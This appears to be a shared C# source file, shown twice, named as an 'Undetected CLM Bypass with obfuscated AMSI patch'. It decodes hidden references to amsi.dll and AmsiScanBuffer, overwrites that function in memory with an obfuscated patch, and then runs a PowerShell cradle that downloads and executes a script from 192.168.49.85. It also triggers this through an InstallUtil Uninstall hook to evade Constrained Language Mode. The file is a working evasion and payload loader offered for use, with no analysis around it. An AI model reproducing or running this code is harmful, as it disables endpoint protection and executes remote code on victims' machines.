mariolima/BypassWithAmsi.cs

## BypassWithAmsi.cs
// Undetected CLM Bypass with obfuscated AMSI patch
using System;
using System.Management.Automation;
using System.Text;
using System.Runtime.InteropServices;
using System.Management.Automation.Runspaces;
using System.Configuration.Install;
namespace Bypass {
	class Program {
		 [DllImport("kernel32")]
		static extern IntPtr GetProcAddress(
			IntPtr hModule,
			string procName);

		[DllImport("kernel32")]
		static extern IntPtr LoadLibrary(
			string name);

		[DllImport("kernel32")]
		static extern bool VirtualProtect(
			IntPtr lpAddress,
			UIntPtr dwSize,
			uint flNewProtect,
			out uint lpflOldProtect);
		static void Main(string[] args) {
			foo();
		}
		public static void foo() {
			byte[] data = Convert.FromBase64String("YW1zaS5kbGw=");
			string am = Encoding.UTF8.GetString(data);
			var lib = LoadLibrary(am);
			data = Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI=");
			am = Encoding.UTF8.GetString(data);
			var asb = GetProcAddress(lib, am);
			var patch = new byte[] { 0xB9, 0x58, 0x01, 0x08, 0x81, 0xC4 };
			for(int i = 0; i < patch.Length; i++) {
				patch[i] = (byte)(((uint)patch[i] - 1));
			}
			_ = VirtualProtect(asb, (UIntPtr)patch.Length, 0x40, out uint oldProtect);
			Marshal.Copy(patch, 0, asb, patch.Length);
			_ = VirtualProtect(asb, (UIntPtr)patch.Length, oldProtect, out uint _);
			String cmd = "IEX(New-Object Net.WebClient).DownloadString('http://192.168.49.85/foos.ps1')";
			Runspace rs = RunspaceFactory.CreateRunspace();
			rs.Open();
			PowerShell ps = PowerShell.Create();
			ps.Runspace = rs;
			ps.AddScript(cmd);
			ps.Invoke();
			rs.Close();
		}
	}
	[System.ComponentModel.RunInstaller(true)]
	public class Sample : System.Configuration.Install.Installer {
		public override void Uninstall(System.Collections.IDictionary savedState) {
			base.Uninstall(savedState);
			Program.foo();
		}
	}
}
	// Undetected CLM Bypass with obfuscated AMSI patch
	using System;
	using System.Management.Automation;
	using System.Text;
	using System.Runtime.InteropServices;
	using System.Management.Automation.Runspaces;
	using System.Configuration.Install;
	namespace Bypass {
	class Program {
	[DllImport("kernel32")]
	static extern IntPtr GetProcAddress(
	IntPtr hModule,
	string procName);

	[DllImport("kernel32")]
	static extern IntPtr LoadLibrary(
	string name);

	[DllImport("kernel32")]
	static extern bool VirtualProtect(
	IntPtr lpAddress,
	UIntPtr dwSize,
	uint flNewProtect,
	out uint lpflOldProtect);
	static void Main(string[] args) {
	foo();
	}
	public static void foo() {
	byte[] data = Convert.FromBase64String("YW1zaS5kbGw=");
	string am = Encoding.UTF8.GetString(data);
	var lib = LoadLibrary(am);
	data = Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI=");
	am = Encoding.UTF8.GetString(data);
	var asb = GetProcAddress(lib, am);
	var patch = new byte[] { 0xB9, 0x58, 0x01, 0x08, 0x81, 0xC4 };
	for(int i = 0; i < patch.Length; i++) {
	patch[i] = (byte)(((uint)patch[i] - 1));
	}
	_ = VirtualProtect(asb, (UIntPtr)patch.Length, 0x40, out uint oldProtect);
	Marshal.Copy(patch, 0, asb, patch.Length);
	_ = VirtualProtect(asb, (UIntPtr)patch.Length, oldProtect, out uint _);
	String cmd = "IEX(New-Object Net.WebClient).DownloadString('http://192.168.49.85/foos.ps1')";
	Runspace rs = RunspaceFactory.CreateRunspace();
	rs.Open();
	PowerShell ps = PowerShell.Create();
	ps.Runspace = rs;
	ps.AddScript(cmd);
	ps.Invoke();
	rs.Close();
	}
	}
	[System.ComponentModel.RunInstaller(true)]
	public class Sample : System.Configuration.Install.Installer {
	public override void Uninstall(System.Collections.IDictionary savedState) {
	base.Uninstall(savedState);
	Program.foo();
	}
	}
	}